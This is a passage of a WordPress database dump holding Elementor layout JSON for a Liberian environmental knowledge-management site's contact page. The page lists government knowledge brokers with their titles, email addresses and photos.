\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(23016,3321,'_elementor_edit_mode','builder'),(23017,3321,'_elementor_template_type','wp-page'),(23018,3321,'_elementor_version','3.0.12'),(23019,3321,'_wp_page_template','default'),(23020,3321,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br 